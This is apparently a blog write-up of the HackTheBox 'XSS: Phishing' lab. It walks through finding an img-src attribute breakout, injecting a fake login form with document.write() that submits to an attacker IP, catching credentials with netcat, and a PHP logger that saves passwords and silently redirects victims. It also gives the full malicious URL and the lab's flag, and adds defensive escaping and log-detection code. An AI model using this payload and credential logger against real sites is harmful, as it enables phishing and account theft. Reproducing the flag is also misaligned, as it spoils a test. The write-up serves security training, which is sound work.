Huy Phu

Summary

The article provides a detailed guide on using Cross-Site Scripting (XSS) to execute a phishing attack, including discovering XSS vulnerabilities, crafting a malicious login form, and capturing user credentials.

Abstract

The article discusses the prevalence of phishing as a primary method for attackers to deceive victims and outlines a method for leveraging XSS vulnerabilities to perform phishing attacks. It begins with the discovery of XSS vulnerabilities by testing payloads, such as <script>alert(1)</script>, and using tools like XSStrike to identify effective payloads. The article then demonstrates how to inject a malicious login form into a vulnerable application to capture user credentials. It provides code examples for the login form injection using document.write() and explains how to set up a netcat listener to receive the stolen credentials. The article also addresses potential user suspicions and suggests improvements to the attack by logging credentials and redirecting users without raising alarms. It concludes with a practical exercise for readers to apply the knowledge by finding a working XSS payload, injecting a malicious login form, and obtaining the flag through a simulated attack.

Opinions

  • The author emphasizes the effectiveness of XSS in phishing attacks due to its ability to deceive users into submitting sensitive information.
  • The use of automated tools like XSStrike is recommended for efficient discovery of XSS vulnerabilities.
  • Injecting a login form is presented as a practical method for capturing credentials, with the caveat that user experience should be considered to avoid suspicion.
  • The article suggests that the technical complexity of executing such attacks is worthwhile for the potential gains.
  • The author encourages readers to engage with the content by providing a hands-on exercise, indicating a didactic approach to cybersecurity education.
  • The conclusion implies that the content is aimed at beginners in the field of cybersecurity, with an acknowledgment that the technical aspects may be challenging but rewarding.

HackTheBox — XSS: Phishing

  • Phishing has become increasingly popular, as it is one of the main ways attackers scam their victims.
  • In this blog post, we will explore how to use XSS to perform a phishing attack.

XSS Discovery

  • Let’s try the <script>alert(1)</script> payload in the application shown above.
  • Nothing happens when we submit the payload. Let’s try some other payloads in the URL to see whether the application is vulnerable.
  • We will use XSStrike to discover valid payloads.
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
# the entry point of the repository is xsstrike.py; $TARGET is the lab's IP address
python3 xsstrike.py -u "http://$TARGET/phishing/index.php?url=<script>alert(1)<%2Fscript>"
  • Let’s try to discover the payload manually. Submit the input “Testing payload” and see where it appears in the HTML body.
  • The value appears within the src attribute of the image tag.
  • Let’s try the following payload: x' onerror=alert(1) alt='testing xss , which results in a complete image tag <img src='x' onerror=alert(1) alt='testing xss'>
  • The application triggers the alert. We’ve found a valid payload.
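The breakout works because the application drops the user-supplied URL straight into a single-quoted src attribute. The following Python is an added example, not code from the post or from the HackTheBox lab: it reconstructs that rendering (the template string is an assumption) next to a hardened version that applies attribute-context escaping, and uses the standard library's HTML parser to show which attributes a browser would actually see in each case.

```python
import html
from html.parser import HTMLParser

# Payload quoted on the page: it closes the src attribute and adds an onerror handler.
PAYLOAD = "x' onerror=alert(1) alt='testing xss"


def render_image_tag_vulnerable(url):
    """Assumed reconstruction of the lab's behaviour: raw input inside src='...'."""
    return f"<img src='{url}'>"


def render_image_tag_hardened(url):
    """Attribute-context escaping: &, <, >, double and single quotes become entities,
    so the value can never terminate the quoted attribute it sits in."""
    return f"<img src='{html.escape(url, quote=True)}'>"


class _ImgAttrCollector(HTMLParser):
    """Records the attributes of the first <img> tag the way a browser's parser sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "img" and self.attrs is None:
            self.attrs = dict(attrs)


def parse_img_attributes(markup):
    """Return {attribute name: value} for the first <img> in the markup."""
    parser = _ImgAttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


def has_event_handler(markup):
    """True if any attribute of the rendered <img> is an on* event handler."""
    return any(name.lower().startswith("on") for name in parse_img_attributes(markup))


if __name__ == "__main__":
    for label, render in (("vulnerable", render_image_tag_vulnerable),
                          ("hardened", render_image_tag_hardened)):
        markup = render(PAYLOAD)
        print(f"{label}: {markup}")
        print(f"  attributes seen by the parser: {parse_img_attributes(markup)}")
        print(f"  event handler present: {has_event_handler(markup)}")
```

In the vulnerable rendering the parser reports three attributes (src, onerror and alt); in the hardened one the whole payload, single quotes included, is simply the value of src. Escaping has to match the output context: html.escape without quote=True would leave the single quote alone and the breakout would still work.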

Login Form Injection

  • Now that we have identified a valid payload, we can inject a login form into the target page whose submission is sent to our server.
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>
  • To inject this form, we use the document.write() function, so the payload becomes:
document.write('<h3>Please login to continue</h3><form action=http://10.10.15.119:5555><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
  • Replace the alert(1) in x' onerror=alert(1) alt='testing xss with this payload in the URL.
  • Set up a Netcat listener: nc -lnvp 5555
  • Once the login form is injected, submit some random credentials. We should get a connection back to our server.
  • As seen in the screenshot, not only did we get a connection back to our server, but we also obtained the login credentials (test:pass).
  • In theory, this is how we steal credentials from users. However, the victim will get a “site can’t be reached” error, which will raise suspicion.
  • Hence, it is better to log the users’ credentials and return them to the original page without any injections. The index.php on our server should look like this:
<?php
// Appends the submitted credentials to creds.txt and sends the victim back to the real page.
// Replace $TARGET with the target host before use: inside a double-quoted PHP string it
// would otherwise be treated as an (undefined) PHP variable and the redirect would break.
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://$TARGET/phishing/index.php");
    fclose($file);
    exit();
}
?>
  • Store index.php in /tmp/tmpservers on the attacker server.
  • Start a PHP listener: sudo php -S 0.0.0.0:8080
  • In the above payload, remember to change the listening port to 8080. Submit the login form and we should receive the users’ credentials.
  • On the front end, the user is returned to the /phishing/index.php page.

Answer the question

Try to find a working XSS payload for the Image URL form found at ‘/phishing’ in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit ‘/phishing/send.php’ to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim’s login credentials, which you can use to login to ‘/phishing/login.php’ and obtain the flag.

  • Repeat the above steps. Once we have confirmed that we receive the credentials, copy the whole URL and paste it into the URL field in send.php.
http://10.129.56.135/phishing/index.php?url=x%27+onerror%3Ddocument.write%28%27%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F10.10.15.160%3A8080%3E%3Cinput+type%3D%22username%22+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%27%29+alt%3D%27testing+xss
  • We should get the credentials on our terminal
  • Log in with the credentials and we should get the flag.
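From the defender's side, both the form injection above and the simpler alert(1) probe are easy to spot in web-server logs, because the entire payload travels in the url query parameter. The following Python is an added example, not code from the post or the lab: it scans constructed Apache-style access-log lines, URL-decodes the parameter and flags the three indicators this post relies on, an on* event handler in attribute context, a document.write() call, and a form action pointing at a host other than the site itself. The log lines and the client IPs (TEST-NET addresses) are invented; the malicious URL is the one shown in the exercise above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (Apache combined-style, trailing fields omitted). The first
# request carries the malicious URL from the exercise, the second the alert(1) probe,
# the third a benign image URL. Client addresses are invented TEST-NET values.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /phishing/index.php?url=x%27+onerror%3Ddocument.write%28%27%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F10.10.15.160%3A8080%3E%3Cinput+type%3D%22username%22+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%27%29+alt%3D%27testing+xss HTTP/1.1" 200 1234
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /phishing/index.php?url=x%27+onerror%3Dalert%281%29+alt%3D%27testing+xss HTTP/1.1" 200 1234
192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /phishing/index.php?url=https%3A%2F%2Fexample.com%2Flogo.png HTTP/1.1" 200 1234
"""

# client, method, request target and status code from a combined-format line
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# an on<something>= attribute, i.e. an inline event handler after an attribute breakout
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
# the action attribute of an injected <form>
FORM_ACTION = re.compile(r"<form\b[^>]*\baction\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def analyse_url_param(target, site_host):
    """Return the indicators found in the decoded 'url' query parameter of a request target."""
    findings = []
    for value in parse_qs(urlsplit(target).query).get("url", []):
        if EVENT_HANDLER.search(value):
            findings.append("event handler attribute in url parameter")
        if "document.write(" in value:
            findings.append("document.write() call in url parameter")
        for action in FORM_ACTION.findall(value):
            host = urlsplit(action).hostname
            if host and host != site_host:
                findings.append(f"injected form submits to external host {host}")
    return findings


def scan_log(log_text, site_host):
    """Parse each access-log line and keep those whose url parameter carries an indicator."""
    alerts = []
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue
        findings = analyse_url_param(match["target"], site_host)
        if findings:
            alerts.append({"client": match["client"], "target": match["target"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG, "10.129.56.135"):
        print(f"{alert['client']} -> {alert['target'][:60]}...")
        for finding in alert["findings"]:
            print(f"    {finding}")
```

Log review is a complement to the real fix, which is context-aware output encoding of the url value. A Content-Security-Policy that omits 'unsafe-inline' from script-src and sets form-action 'self' would additionally stop the onerror handler from running and stop the injected form from submitting to an external host, even if an encoding bug slipped through.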

Answer: HTB{r3f13c73d_cr3d5_84ck_2_m3}

CONCLUSION

  • That’s it for today. This is something really new and exciting for a lot of beginners. The technical aspect may be a little overwhelming, but it is all worth it.
  • Please clap if you like my post and follow me for more Cybersecurity content.